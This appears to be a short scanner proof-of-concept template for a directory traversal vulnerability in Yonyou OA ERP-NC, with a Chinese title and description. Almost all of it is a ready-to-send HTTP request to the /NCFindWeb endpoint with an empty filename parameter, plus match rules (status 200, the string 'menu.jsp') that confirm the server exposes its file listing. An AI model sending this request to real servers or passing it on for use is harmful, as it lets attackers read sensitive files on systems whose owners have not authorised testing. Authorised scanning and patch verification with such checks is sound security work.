<DudePoc_Name>用友 OA ERP-NC存在目录遍历漏洞</DudePoc_Name>
<DudePoc_Description>用友ERP-NC存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息</DudePoc_Description>
<DudePoc_SetHeader>
GET /NCFindWeb?service=IPreAlertConfigService&filename= HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>menu.jsp</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
